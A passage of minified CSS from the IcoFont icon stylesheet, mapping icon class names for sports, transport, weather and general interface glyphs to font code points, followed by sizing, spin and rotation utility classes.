:before{content:"\ed9a"}.icofont-corner:before{content:"\ed9b"}.icofont-field-alt:before{content:"\ed9c"}.icofont-field:before{content:"\ed9d"}.icofont-football-alt:before{content:"\ed9e"}.icofont-football-american:before{content:"\ed9f"}.icofont-football:before{content:"\eda0"}.icofont-foul:before{content:"\eda1"}.icofont-goal-keeper:before{content:"\eda2"}.icofont-goal:before{content:"\eda3"}.icofont-golf-alt:before{content:"\eda4"}.icofont-golf-bag:before{content:"\eda5"}.icofont-golf-cart:before{content:"\eda6"}.icofont-golf-field:before{content:"\eda7"}.icofont-golf:before{content:"\eda8"}.icofont-golfer:before{content:"\eda9"}.icofont-helmet:before{content:"\edaa"}.icofont-hockey-alt:before{content:"\edab"}.icofont-hockey:before{content:"\edac"}.icofont-ice-skate:before{content:"\edad"}.icofont-jersey-alt:before{content:"\edae"}.icofont-jersey:before{content:"\edaf"}.icofont-jumping:before{content:"\edb0"}.icofont-kick:before{content:"\edb1"}.icofont-leg:before{content:"\edb2"}.icofont-match-review:before{content:"\edb3"}.icofont-medal-sport:before{content:"\edb4"}.icofont-offside:before{content:"\edb5"}.icofont-olympic-logo:before{content:"\edb6"}.icofont-olympic:before{content:"\edb7"}.icofont-padding:before{content:"\edb8"}.icofont-penalty-card:before{content:"\edb9"}.icofont-racer:before{content:"\edba"}.icofont-racing-car:before{content:"\edbb"}.icofont-racing-flag-alt:before{content:"\edbc"}.icofont-racing-flag:before{content:"\edbd"}.icofont-racings-wheel:before{content:"\edbe"}.icofont-referee:before{content:"\edbf"}.icofont-refree-jersey:before{content:"\edc0"}.icofont-result-sport:before{content:"\edc1"}.icofont-rugby-ball:before{content:"\edc2"}.icofont-rugby-player:before{content:"\edc3"}.icofont-rugby:before{content:"\edc4"}.icofont-runner-alt-1:before{content:"\edc5"}.icofont-runner-alt-2:before{content:"\edc6"}.icofont-runner:before{content:"\edc7"}.icofont-score-board:before{content:"\edc8"}.icofont-skiing-man:before{content:"\edc9"}.icofont-skydiving-goggles:before{content:"\edca"}.icofont-snow-mobile:before{content:"\edcb"}.icofont-steering:before{content:"\edcc"}.icofont-stopwatch:before{content:"\edcd"}.icofont-substitute:before{content:"\edce"}.icofont-swimmer:before{content:"\edcf"}.icofont-table-tennis:before{content:"\edd0"}.icofont-team-alt:before{content:"\edd1"}.icofont-team:before{content:"\edd2"}.icofont-tennis-player:before{content:"\edd3"}.icofont-tennis:before{content:"\edd4"}.icofont-tracking:before{content:"\edd5"}.icofont-trophy-alt:before{content:"\edd6"}.icofont-trophy:before{content:"\edd7"}.icofont-volleyball-alt:before{content:"\edd8"}.icofont-volleyball-fire:before{content:"\edd9"}.icofont-volleyball:before{content:"\edda"}.icofont-water-bottle:before{content:"\eddb"}.icofont-whistle-alt:before{content:"\eddc"}.icofont-whistle:before{content:"\eddd"}.icofont-win-trophy:before{content:"\edde"}.icofont-align-center:before{content:"\eddf"}.icofont-align-left:before{content:"\ede0"}.icofont-align-right:before{content:"\ede1"}.icofont-all-caps:before{content:"\ede2"}.icofont-bold:before{content:"\ede3"}.icofont-brush:before{content:"\ede4"}.icofont-clip-board:before{content:"\ede5"}.icofont-code-alt:before{content:"\ede6"}.icofont-color-bucket:before{content:"\ede7"}.icofont-color-picker:before{content:"\ede8"}.icofont-copy-invert:before{content:"\ede9"}.icofont-copy:before{content:"\edea"}.icofont-cut:before{content:"\edeb"}.icofont-delete-alt:before{content:"\edec"}.icofont-edit-alt:before{content:"\eded"}.icofont-eraser-alt:before{content:"\edee"}.icofont-font:before{content:"\edef"}.icofont-heading:before{content:"\edf0"}.icofont-indent:before{content:"\edf1"}.icofont-italic-alt:before{content:"\edf2"}.icofont-italic:before{content:"\edf3"}.icofont-justify-all:before{content:"\edf4"}.icofont-justify-center:before{content:"\edf5"}.icofont-justify-left:before{content:"\edf6"}.icofont-justify-right:before{content:"\edf7"}.icofont-link-broken:before{content:"\edf8"}.icofont-outdent:before{content:"\edf9"}.icofont-paper-clip:before{content:"\edfa"}.icofont-paragraph:before{content:"\edfb"}.icofont-pin:before{content:"\edfc"}.icofont-printer:before{content:"\edfd"}.icofont-redo:before{content:"\edfe"}.icofont-rotation:before{content:"\edff"}.icofont-save:before{content:"\ee00"}.icofont-small-cap:before{content:"\ee01"}.icofont-strike-through:before{content:"\ee02"}.icofont-sub-listing:before{content:"\ee03"}.icofont-subscript:before{content:"\ee04"}.icofont-superscript:before{content:"\ee05"}.icofont-table:before{content:"\ee06"}.icofont-text-height:before{content:"\ee07"}.icofont-text-width:before{content:"\ee08"}.icofont-trash:before{content:"\ee09"}.icofont-underline:before{content:"\ee0a"}.icofont-undo:before{content:"\ee0b"}.icofont-air-balloon:before{content:"\ee0c"}.icofont-airplane-alt:before{content:"\ee0d"}.icofont-airplane:before{content:"\ee0e"}.icofont-articulated-truck:before{content:"\ee0f"}.icofont-auto-mobile:before{content:"\ee10"}.icofont-auto-rickshaw:before{content:"\ee11"}.icofont-bicycle-alt-1:before{content:"\ee12"}.icofont-bicycle-alt-2:before{content:"\ee13"}.icofont-bicycle:before{content:"\ee14"}.icofont-bus-alt-1:before{content:"\ee15"}.icofont-bus-alt-2:before{content:"\ee16"}.icofont-bus-alt-3:before{content:"\ee17"}.icofont-bus:before{content:"\ee18"}.icofont-cab:before{content:"\ee19"}.icofont-cable-car:before{content:"\ee1a"}.icofont-car-alt-1:before{content:"\ee1b"}.icofont-car-alt-2:before{content:"\ee1c"}.icofont-car-alt-3:before{content:"\ee1d"}.icofont-car-alt-4:before{content:"\ee1e"}.icofont-car:before{content:"\ee1f"}.icofont-delivery-time:before{content:"\ee20"}.icofont-fast-delivery:before{content:"\ee21"}.icofont-fire-truck-alt:before{content:"\ee22"}.icofont-fire-truck:before{content:"\ee23"}.icofont-free-delivery:before{content:"\ee24"}.icofont-helicopter:before{content:"\ee25"}.icofont-motor-bike-alt:before{content:"\ee26"}.icofont-motor-bike:before{content:"\ee27"}.icofont-motor-biker:before{content:"\ee28"}.icofont-oil-truck:before{content:"\ee29"}.icofont-rickshaw:before{content:"\ee2a"}.icofont-rocket-alt-1:before{content:"\ee2b"}.icofont-rocket-alt-2:before{content:"\ee2c"}.icofont-rocket:before{content:"\ee2d"}.icofont-sail-boat-alt-1:before{content:"\ee2e"}.icofont-sail-boat-alt-2:before{content:"\ee2f"}.icofont-sail-boat:before{content:"\ee30"}.icofont-scooter:before{content:"\ee31"}.icofont-sea-plane:before{content:"\ee32"}.icofont-ship-alt:before{content:"\ee33"}.icofont-ship:before{content:"\ee34"}.icofont-speed-boat:before{content:"\ee35"}.icofont-taxi:before{content:"\ee36"}.icofont-tractor:before{content:"\ee37"}.icofont-train-line:before{content:"\ee38"}.icofont-train-steam:before{content:"\ee39"}.icofont-tram:before{content:"\ee3a"}.icofont-truck-alt:before{content:"\ee3b"}.icofont-truck-loaded:before{content:"\ee3c"}.icofont-truck:before{content:"\ee3d"}.icofont-van-alt:before{content:"\ee3e"}.icofont-van:before{content:"\ee3f"}.icofont-yacht:before{content:"\ee40"}.icofont-5-star-hotel:before{content:"\ee41"}.icofont-air-ticket:before{content:"\ee42"}.icofont-beach-bed:before{content:"\ee43"}.icofont-beach:before{content:"\ee44"}.icofont-camping-vest:before{content:"\ee45"}.icofont-direction-sign:before{content:"\ee46"}.icofont-hill-side:before{content:"\ee47"}.icofont-hill:before{content:"\ee48"}.icofont-hotel:before{content:"\ee49"}.icofont-island-alt:before{content:"\ee4a"}.icofont-island:before{content:"\ee4b"}.icofont-sandals-female:before{content:"\ee4c"}.icofont-sandals-male:before{content:"\ee4d"}.icofont-travelling:before{content:"\ee4e"}.icofont-breakdown:before{content:"\ee4f"}.icofont-celsius:before{content:"\ee50"}.icofont-clouds:before{content:"\ee51"}.icofont-cloudy:before{content:"\ee52"}.icofont-dust:before{content:"\ee53"}.icofont-eclipse:before{content:"\ee54"}.icofont-fahrenheit:before{content:"\ee55"}.icofont-forest-fire:before{content:"\ee56"}.icofont-full-night:before{content:"\ee57"}.icofont-full-sunny:before{content:"\ee58"}.icofont-hail-night:before{content:"\ee59"}.icofont-hail-rainy-night:before{content:"\ee5a"}.icofont-hail-rainy-sunny:before{content:"\ee5b"}.icofont-hail-rainy:before{content:"\ee5c"}.icofont-hail-sunny:before{content:"\ee5d"}.icofont-hail-thunder-night:before{content:"\ee5e"}.icofont-hail-thunder-sunny:before{content:"\ee5f"}.icofont-hail-thunder:before{content:"\ee60"}.icofont-hail:before{content:"\ee61"}.icofont-hill-night:before{content:"\ee62"}.icofont-hill-sunny:before{content:"\ee63"}.icofont-hurricane:before{content:"\ee64"}.icofont-meteor:before{content:"\ee65"}.icofont-night:before{content:"\ee66"}.icofont-rainy-night:before{content:"\ee67"}.icofont-rainy-sunny:before{content:"\ee68"}.icofont-rainy-thunder:before{content:"\ee69"}.icofont-rainy:before{content:"\ee6a"}.icofont-snow-alt:before{content:"\ee6b"}.icofont-snow-flake:before{content:"\ee6c"}.icofont-snow-temp:before{content:"\ee6d"}.icofont-snow:before{content:"\ee6e"}.icofont-snowy-hail:before{content:"\ee6f"}.icofont-snowy-night-hail:before{content:"\ee70"}.icofont-snowy-night-rainy:before{content:"\ee71"}.icofont-snowy-night:before{content:"\ee72"}.icofont-snowy-rainy:before{content:"\ee73"}.icofont-snowy-sunny-hail:before{content:"\ee74"}.icofont-snowy-sunny-rainy:before{content:"\ee75"}.icofont-snowy-sunny:before{content:"\ee76"}.icofont-snowy-thunder-night:before{content:"\ee77"}.icofont-snowy-thunder-sunny:before{content:"\ee78"}.icofont-snowy-thunder:before{content:"\ee79"}.icofont-snowy-windy-night:before{content:"\ee7a"}.icofont-snowy-windy-sunny:before{content:"\ee7b"}.icofont-snowy-windy:before{content:"\ee7c"}.icofont-snowy:before{content:"\ee7d"}.icofont-sun-alt:before{content:"\ee7e"}.icofont-sun-rise:before{content:"\ee7f"}.icofont-sun-set:before{content:"\ee80"}.icofont-sun:before{content:"\ee81"}.icofont-sunny-day-temp:before{content:"\ee82"}.icofont-sunny:before{content:"\ee83"}.icofont-thunder-light:before{content:"\ee84"}.icofont-tornado:before{content:"\ee85"}.icofont-umbrella-alt:before{content:"\ee86"}.icofont-umbrella:before{content:"\ee87"}.icofont-volcano:before{content:"\ee88"}.icofont-wave:before{content:"\ee89"}.icofont-wind-scale-0:before{content:"\ee8a"}.icofont-wind-scale-1:before{content:"\ee8b"}.icofont-wind-scale-10:before{content:"\ee8c"}.icofont-wind-scale-11:before{content:"\ee8d"}.icofont-wind-scale-12:before{content:"\ee8e"}.icofont-wind-scale-2:before{content:"\ee8f"}.icofont-wind-scale-3:before{content:"\ee90"}.icofont-wind-scale-4:before{content:"\ee91"}.icofont-wind-scale-5:before{content:"\ee92"}.icofont-wind-scale-6:before{content:"\ee93"}.icofont-wind-scale-7:before{content:"\ee94"}.icofont-wind-scale-8:before{content:"\ee95"}.icofont-wind-scale-9:before{content:"\ee96"}.icofont-wind-waves:before{content:"\ee97"}.icofont-wind:before{content:"\ee98"}.icofont-windy-hail:before{content:"\ee99"}.icofont-windy-night:before{content:"\ee9a"}.icofont-windy-raining:before{content:"\ee9b"}.icofont-windy-sunny:before{content:"\ee9c"}.icofont-windy-thunder-raining:before{content:"\ee9d"}.icofont-windy-thunder:before{content:"\ee9e"}.icofont-windy:before{content:"\ee9f"}.icofont-addons:before{content:"\eea0"}.icofont-address-book:before{content:"\eea1"}.icofont-adjust:before{content:"\eea2"}.icofont-alarm:before{content:"\eea3"}.icofont-anchor:before{content:"\eea4"}.icofont-archive:before{content:"\eea5"}.icofont-at:before{content:"\eea6"}.icofont-attachment:before{content:"\eea7"}.icofont-audio:before{content:"\eea8"}.icofont-automation:before{content:"\eea9"}.icofont-badge:before{content:"\eeaa"}.icofont-bag-alt:before{content:"\eeab"}.icofont-bag:before{content:"\eeac"}.icofont-ban:before{content:"\eead"}.icofont-bar-code:before{content:"\eeae"}.icofont-bars:before{content:"\eeaf"}.icofont-basket:before{content:"\eeb0"}.icofont-battery-empty:before{content:"\eeb1"}.icofont-battery-full:before{content:"\eeb2"}.icofont-battery-half:before{content:"\eeb3"}.icofont-battery-low:before{content:"\eeb4"}.icofont-beaker:before{content:"\eeb5"}.icofont-beard:before{content:"\eeb6"}.icofont-bed:before{content:"\eeb7"}.icofont-bell:before{content:"\eeb8"}.icofont-beverage:before{content:"\eeb9"}.icofont-bill:before{content:"\eeba"}.icofont-bin:before{content:"\eebb"}.icofont-binary:before{content:"\eebc"}.icofont-binoculars:before{content:"\eebd"}.icofont-bluetooth:before{content:"\eebe"}.icofont-bomb:before{content:"\eebf"}.icofont-book-mark:before{content:"\eec0"}.icofont-box:before{content:"\eec1"}.icofont-briefcase:before{content:"\eec2"}.icofont-broken:before{content:"\eec3"}.icofont-bucket:before{content:"\eec4"}.icofont-bucket1:before{content:"\eec5"}.icofont-bucket2:before{content:"\eec6"}.icofont-bug:before{content:"\eec7"}.icofont-building:before{content:"\eec8"}.icofont-bulb-alt:before{content:"\eec9"}.icofont-bullet:before{content:"\eeca"}.icofont-bullhorn:before{content:"\eecb"}.icofont-bullseye:before{content:"\eecc"}.icofont-calendar:before{content:"\eecd"}.icofont-camera-alt:before{content:"\eece"}.icofont-camera:before{content:"\eecf"}.icofont-card:before{content:"\eed0"}.icofont-cart-alt:before{content:"\eed1"}.icofont-cart:before{content:"\eed2"}.icofont-cc:before{content:"\eed3"}.icofont-charging:before{content:"\eed4"}.icofont-chat:before{content:"\eed5"}.icofont-check-alt:before{content:"\eed6"}.icofont-check-circled:before{content:"\eed7"}.icofont-check:before{content:"\eed8"}.icofont-checked:before{content:"\eed9"}.icofont-children-care:before{content:"\eeda"}.icofont-clip:before{content:"\eedb"}.icofont-clock-time:before{content:"\eedc"}.icofont-close-circled:before{content:"\eedd"}.icofont-close-line-circled:before{content:"\eede"}.icofont-close-line-squared-alt:before{content:"\eedf"}.icofont-close-line-squared:before{content:"\eee0"}.icofont-close-line:before{content:"\eee1"}.icofont-close-squared-alt:before{content:"\eee2"}.icofont-close-squared:before{content:"\eee3"}.icofont-close:before{content:"\eee4"}.icofont-cloud-download:before{content:"\eee5"}.icofont-cloud-refresh:before{content:"\eee6"}.icofont-cloud-upload:before{content:"\eee7"}.icofont-cloud:before{content:"\eee8"}.icofont-code-not-allowed:before{content:"\eee9"}.icofont-code:before{content:"\eeea"}.icofont-comment:before{content:"\eeeb"}.icofont-compass-alt:before{content:"\eeec"}.icofont-compass:before{content:"\eeed"}.icofont-computer:before{content:"\eeee"}.icofont-connection:before{content:"\eeef"}.icofont-console:before{content:"\eef0"}.icofont-contacts:before{content:"\eef1"}.icofont-contrast:before{content:"\eef2"}.icofont-copyright:before{content:"\eef3"}.icofont-credit-card:before{content:"\eef4"}.icofont-crop:before{content:"\eef5"}.icofont-crown:before{content:"\eef6"}.icofont-cube:before{content:"\eef7"}.icofont-cubes:before{content:"\eef8"}.icofont-dashboard-web:before{content:"\eef9"}.icofont-dashboard:before{content:"\eefa"}.icofont-data:before{content:"\eefb"}.icofont-database-add:before{content:"\eefc"}.icofont-database-locked:before{content:"\eefd"}.icofont-database-remove:before{content:"\eefe"}.icofont-database:before{content:"\eeff"}.icofont-delete:before{content:"\ef00"}.icofont-diamond:before{content:"\ef01"}.icofont-dice-multiple:before{content:"\ef02"}.icofont-dice:before{content:"\ef03"}.icofont-disc:before{content:"\ef04"}.icofont-diskette:before{content:"\ef05"}.icofont-document-folder:before{content:"\ef06"}.icofont-download-alt:before{content:"\ef07"}.icofont-download:before{content:"\ef08"}.icofont-downloaded:before{content:"\ef09"}.icofont-drag:before{content:"\ef0a"}.icofont-drag1:before{content:"\ef0b"}.icofont-drag2:before{content:"\ef0c"}.icofont-drag3:before{content:"\ef0d"}.icofont-earth:before{content:"\ef0e"}.icofont-ebook:before{content:"\ef0f"}.icofont-edit:before{content:"\ef10"}.icofont-eject:before{content:"\ef11"}.icofont-email:before{content:"\ef12"}.icofont-envelope-open:before{content:"\ef13"}.icofont-envelope:before{content:"\ef14"}.icofont-eraser:before{content:"\ef15"}.icofont-error:before{content:"\ef16"}.icofont-excavator:before{content:"\ef17"}.icofont-exchange:before{content:"\ef18"}.icofont-exclamation-circle:before{content:"\ef19"}.icofont-exclamation-square:before{content:"\ef1a"}.icofont-exclamation-tringle:before{content:"\ef1b"}.icofont-exclamation:before{content:"\ef1c"}.icofont-exit:before{content:"\ef1d"}.icofont-expand:before{content:"\ef1e"}.icofont-external-link:before{content:"\ef1f"}.icofont-external:before{content:"\ef20"}.icofont-eye-alt:before{content:"\ef21"}.icofont-eye-blocked:before{content:"\ef22"}.icofont-eye-dropper:before{content:"\ef23"}.icofont-eye:before{content:"\ef24"}.icofont-favourite:before{content:"\ef25"}.icofont-fax:before{content:"\ef26"}.icofont-file-fill:before{content:"\ef27"}.icofont-film:before{content:"\ef28"}.icofont-filter:before{content:"\ef29"}.icofont-fire-alt:before{content:"\ef2a"}.icofont-fire-burn:before{content:"\ef2b"}.icofont-fire:before{content:"\ef2c"}.icofont-flag-alt-1:before{content:"\ef2d"}.icofont-flag-alt-2:before{content:"\ef2e"}.icofont-flag:before{content:"\ef2f"}.icofont-flame-torch:before{content:"\ef30"}.icofont-flash-light:before{content:"\ef31"}.icofont-flash:before{content:"\ef32"}.icofont-flask:before{content:"\ef33"}.icofont-focus:before{content:"\ef34"}.icofont-folder-open:before{content:"\ef35"}.icofont-folder:before{content:"\ef36"}.icofont-foot-print:before{content:"\ef37"}.icofont-garbage:before{content:"\ef38"}.icofont-gear-alt:before{content:"\ef39"}.icofont-gear:before{content:"\ef3a"}.icofont-gears:before{content:"\ef3b"}.icofont-gift:before{content:"\ef3c"}.icofont-glass:before{content:"\ef3d"}.icofont-globe:before{content:"\ef3e"}.icofont-graffiti:before{content:"\ef3f"}.icofont-grocery:before{content:"\ef40"}.icofont-hand:before{content:"\ef41"}.icofont-hanger:before{content:"\ef42"}.icofont-hard-disk:before{content:"\ef43"}.icofont-heart-alt:before{content:"\ef44"}.icofont-heart:before{content:"\ef45"}.icofont-history:before{content:"\ef46"}.icofont-home:before{content:"\ef47"}.icofont-horn:before{content:"\ef48"}.icofont-hour-glass:before{content:"\ef49"}.icofont-id:before{content:"\ef4a"}.icofont-image:before{content:"\ef4b"}.icofont-inbox:before{content:"\ef4c"}.icofont-infinite:before{content:"\ef4d"}.icofont-info-circle:before{content:"\ef4e"}.icofont-info-square:before{content:"\ef4f"}.icofont-info:before{content:"\ef50"}.icofont-institution:before{content:"\ef51"}.icofont-interface:before{content:"\ef52"}.icofont-invisible:before{content:"\ef53"}.icofont-jacket:before{content:"\ef54"}.icofont-jar:before{content:"\ef55"}.icofont-jewlery:before{content:"\ef56"}.icofont-karate:before{content:"\ef57"}.icofont-key-hole:before{content:"\ef58"}.icofont-key:before{content:"\ef59"}.icofont-label:before{content:"\ef5a"}.icofont-lamp:before{content:"\ef5b"}.icofont-layers:before{content:"\ef5c"}.icofont-layout:before{content:"\ef5d"}.icofont-leaf:before{content:"\ef5e"}.icofont-leaflet:before{content:"\ef5f"}.icofont-learn:before{content:"\ef60"}.icofont-lego:before{content:"\ef61"}.icofont-lens:before{content:"\ef62"}.icofont-letter:before{content:"\ef63"}.icofont-letterbox:before{content:"\ef64"}.icofont-library:before{content:"\ef65"}.icofont-license:before{content:"\ef66"}.icofont-life-bouy:before{content:"\ef67"}.icofont-life-buoy:before{content:"\ef68"}.icofont-life-jacket:before{content:"\ef69"}.icofont-life-ring:before{content:"\ef6a"}.icofont-light-bulb:before{content:"\ef6b"}.icofont-lighter:before{content:"\ef6c"}.icofont-lightning-ray:before{content:"\ef6d"}.icofont-like:before{content:"\ef6e"}.icofont-line-height:before{content:"\ef6f"}.icofont-link-alt:before{content:"\ef70"}.icofont-link:before{content:"\ef71"}.icofont-list:before{content:"\ef72"}.icofont-listening:before{content:"\ef73"}.icofont-listine-dots:before{content:"\ef74"}.icofont-listing-box:before{content:"\ef75"}.icofont-listing-number:before{content:"\ef76"}.icofont-live-support:before{content:"\ef77"}.icofont-location-arrow:before{content:"\ef78"}.icofont-location-pin:before{content:"\ef79"}.icofont-lock:before{content:"\ef7a"}.icofont-login:before{content:"\ef7b"}.icofont-logout:before{content:"\ef7c"}.icofont-lollipop:before{content:"\ef7d"}.icofont-long-drive:before{content:"\ef7e"}.icofont-look:before{content:"\ef7f"}.icofont-loop:before{content:"\ef80"}.icofont-luggage:before{content:"\ef81"}.icofont-lunch:before{content:"\ef82"}.icofont-lungs:before{content:"\ef83"}.icofont-magic-alt:before{content:"\ef84"}.icofont-magic:before{content:"\ef85"}.icofont-magnet:before{content:"\ef86"}.icofont-mail-box:before{content:"\ef87"}.icofont-mail:before{content:"\ef88"}.icofont-male:before{content:"\ef89"}.icofont-map-pins:before{content:"\ef8a"}.icofont-map:before{content:"\ef8b"}.icofont-maximize:before{content:"\ef8c"}.icofont-measure:before{content:"\ef8d"}.icofont-medicine:before{content:"\ef8e"}.icofont-mega-phone:before{content:"\ef8f"}.icofont-megaphone-alt:before{content:"\ef90"}.icofont-megaphone:before{content:"\ef91"}.icofont-memorial:before{content:"\ef92"}.icofont-memory-card:before{content:"\ef93"}.icofont-mic-mute:before{content:"\ef94"}.icofont-mic:before{content:"\ef95"}.icofont-military:before{content:"\ef96"}.icofont-mill:before{content:"\ef97"}.icofont-minus-circle:before{content:"\ef98"}.icofont-minus-square:before{content:"\ef99"}.icofont-minus:before{content:"\ef9a"}.icofont-mobile-phone:before{content:"\ef9b"}.icofont-molecule:before{content:"\ef9c"}.icofont-money:before{content:"\ef9d"}.icofont-moon:before{content:"\ef9e"}.icofont-mop:before{content:"\ef9f"}.icofont-muffin:before{content:"\efa0"}.icofont-mustache:before{content:"\efa1"}.icofont-navigation-menu:before{content:"\efa2"}.icofont-navigation:before{content:"\efa3"}.icofont-network-tower:before{content:"\efa4"}.icofont-network:before{content:"\efa5"}.icofont-news:before{content:"\efa6"}.icofont-newspaper:before{content:"\efa7"}.icofont-no-smoking:before{content:"\efa8"}.icofont-not-allowed:before{content:"\efa9"}.icofont-notebook:before{content:"\efaa"}.icofont-notepad:before{content:"\efab"}.icofont-notification:before{content:"\efac"}.icofont-numbered:before{content:"\efad"}.icofont-opposite:before{content:"\efae"}.icofont-optic:before{content:"\efaf"}.icofont-options:before{content:"\efb0"}.icofont-package:before{content:"\efb1"}.icofont-page:before{content:"\efb2"}.icofont-paint:before{content:"\efb3"}.icofont-paper-plane:before{content:"\efb4"}.icofont-paperclip:before{content:"\efb5"}.icofont-papers:before{content:"\efb6"}.icofont-pay:before{content:"\efb7"}.icofont-penguin-linux:before{content:"\efb8"}.icofont-pestle:before{content:"\efb9"}.icofont-phone-circle:before{content:"\efba"}.icofont-phone:before{content:"\efbb"}.icofont-picture:before{content:"\efbc"}.icofont-pine:before{content:"\efbd"}.icofont-pixels:before{content:"\efbe"}.icofont-plugin:before{content:"\efbf"}.icofont-plus-circle:before{content:"\efc0"}.icofont-plus-square:before{content:"\efc1"}.icofont-plus:before{content:"\efc2"}.icofont-polygonal:before{content:"\efc3"}.icofont-power:before{content:"\efc4"}.icofont-price:before{content:"\efc5"}.icofont-print:before{content:"\efc6"}.icofont-puzzle:before{content:"\efc7"}.icofont-qr-code:before{content:"\efc8"}.icofont-queen:before{content:"\efc9"}.icofont-question-circle:before{content:"\efca"}.icofont-question-square:before{content:"\efcb"}.icofont-question:before{content:"\efcc"}.icofont-quote-left:before{content:"\efcd"}.icofont-quote-right:before{content:"\efce"}.icofont-random:before{content:"\efcf"}.icofont-recycle:before{content:"\efd0"}.icofont-refresh:before{content:"\efd1"}.icofont-repair:before{content:"\efd2"}.icofont-reply-all:before{content:"\efd3"}.icofont-reply:before{content:"\efd4"}.icofont-resize:before{content:"\efd5"}.icofont-responsive:before{content:"\efd6"}.icofont-retweet:before{content:"\efd7"}.icofont-road:before{content:"\efd8"}.icofont-robot:before{content:"\efd9"}.icofont-royal:before{content:"\efda"}.icofont-rss-feed:before{content:"\efdb"}.icofont-safety:before{content:"\efdc"}.icofont-sale-discount:before{content:"\efdd"}.icofont-satellite:before{content:"\efde"}.icofont-send-mail:before{content:"\efdf"}.icofont-server:before{content:"\efe0"}.icofont-settings-alt:before{content:"\efe1"}.icofont-settings:before{content:"\efe2"}.icofont-share-alt:before{content:"\efe3"}.icofont-share-boxed:before{content:"\efe4"}.icofont-share:before{content:"\efe5"}.icofont-shield:before{content:"\efe6"}.icofont-shopping-cart:before{content:"\efe7"}.icofont-sign-in:before{content:"\efe8"}.icofont-sign-out:before{content:"\efe9"}.icofont-signal:before{content:"\efea"}.icofont-site-map:before{content:"\efeb"}.icofont-smart-phone:before{content:"\efec"}.icofont-soccer:before{content:"\efed"}.icofont-sort-alt:before{content:"\efee"}.icofont-sort:before{content:"\efef"}.icofont-space:before{content:"\eff0"}.icofont-spanner:before{content:"\eff1"}.icofont-speech-comments:before{content:"\eff2"}.icofont-speed-meter:before{content:"\eff3"}.icofont-spinner-alt-1:before{content:"\eff4"}.icofont-spinner-alt-2:before{content:"\eff5"}.icofont-spinner-alt-3:before{content:"\eff6"}.icofont-spinner-alt-4:before{content:"\eff7"}.icofont-spinner-alt-5:before{content:"\eff8"}.icofont-spinner-alt-6:before{content:"\eff9"}.icofont-spinner:before{content:"\effa"}.icofont-spreadsheet:before{content:"\effb"}.icofont-square:before{content:"\effc"}.icofont-ssl-security:before{content:"\effd"}.icofont-star-alt-1:before{content:"\effe"}.icofont-star-alt-2:before{content:"\efff"}.icofont-star:before{content:"\f000"}.icofont-street-view:before{content:"\f001"}.icofont-support-faq:before{content:"\f002"}.icofont-tack-pin:before{content:"\f003"}.icofont-tag:before{content:"\f004"}.icofont-tags:before{content:"\f005"}.icofont-tasks-alt:before{content:"\f006"}.icofont-tasks:before{content:"\f007"}.icofont-telephone:before{content:"\f008"}.icofont-telescope:before{content:"\f009"}.icofont-terminal:before{content:"\f00a"}.icofont-thumbs-down:before{content:"\f00b"}.icofont-thumbs-up:before{content:"\f00c"}.icofont-tick-boxed:before{content:"\f00d"}.icofont-tick-mark:before{content:"\f00e"}.icofont-ticket:before{content:"\f00f"}.icofont-tie:before{content:"\f010"}.icofont-toggle-off:before{content:"\f011"}.icofont-toggle-on:before{content:"\f012"}.icofont-tools-alt-2:before{content:"\f013"}.icofont-tools:before{content:"\f014"}.icofont-touch:before{content:"\f015"}.icofont-traffic-light:before{content:"\f016"}.icofont-transparent:before{content:"\f017"}.icofont-tree:before{content:"\f018"}.icofont-unique-idea:before{content:"\f019"}.icofont-unlock:before{content:"\f01a"}.icofont-unlocked:before{content:"\f01b"}.icofont-upload-alt:before{content:"\f01c"}.icofont-upload:before{content:"\f01d"}.icofont-usb-drive:before{content:"\f01e"}.icofont-usb:before{content:"\f01f"}.icofont-vector-path:before{content:"\f020"}.icofont-verification-check:before{content:"\f021"}.icofont-wall-clock:before{content:"\f022"}.icofont-wall:before{content:"\f023"}.icofont-wallet:before{content:"\f024"}.icofont-warning-alt:before{content:"\f025"}.icofont-warning:before{content:"\f026"}.icofont-water-drop:before{content:"\f027"}.icofont-web:before{content:"\f028"}.icofont-wheelchair:before{content:"\f029"}.icofont-wifi-alt:before{content:"\f02a"}.icofont-wifi:before{content:"\f02b"}.icofont-world:before{content:"\f02c"}.icofont-zigzag:before{content:"\f02d"}.icofont-zipped:before{content:"\f02e"}.icofont-xs{font-size:.5em}.icofont-sm{font-size:.75em}.icofont-md{font-size:1.25em}.icofont-lg{font-size:1.5em}.icofont-1x{font-size:1em}.icofont-2x{font-size:2em}.icofont-3x{font-size:3em}.icofont-4x{font-size:4em}.icofont-5x{font-size:5em}.icofont-6x{font-size:6em}.icofont-7x{font-size:7em}.icofont-8x{font-size:8em}.icofont-9x{font-size:9em}.icofont-10x{font-size:10em}.icofont-fw{text-align:center;width:1.25em}.icofont-ul{list-style-type:none;padding-left:0;margin-left:0}.icofont-ul>li{position:relative;line-height:2em}.icofont-ul>li .icofont{display:inline-block;vertical-align:middle}.icofont-border{border:solid .08em #f1f1f1;border-radius:.1em;padding:.2em .25em .15em}.icofont-pull-left{float:left}.icofont-pull-right{float:right}.icofont.icofont-pull-left{margin-right:.3em}.icofont.icofont-pull-right{margin-left:.3em}.icofont-spin{-webkit-animation:icofont-spin 2s infinite linear;animation:icofont-spin 2s infinite linear;display:inline-block}.icofont-pulse{-webkit-animation:icofont-spin 1s infinite steps(8);animation:icofont-spin 1s infinite steps(8);display:inline-block}@-webkit-keyframes icofont-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes icofont-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.icofont-rotate-90{-webkit-transform:rotate(90deg);transform:rotate(90deg)}.icofont-rotate-180{-webkit-transform:rotate(180deg);transform:rotate(180deg)}.icofont-rotate-270{-webkit-transform:rotate(270deg);transform:rotate(270deg)}.icofont-flip-horizontal{-webkit-transform:scale(-1,1);transform:scale(-1,1)}.icofont-flip-vertical{-webkit-transform:scale(1,-1);transform:scale(1,-1)}.icofont-flip-horizontal.icofont-flip-vertical{-webkit-transform:scale(-1,-1);transform:scale(-1,-1)}:root .icofont-flip-horizontal,:root .icofont-flip-vertical,:root .icofont-rotate-180,:root .icofont-rotate-270,:root 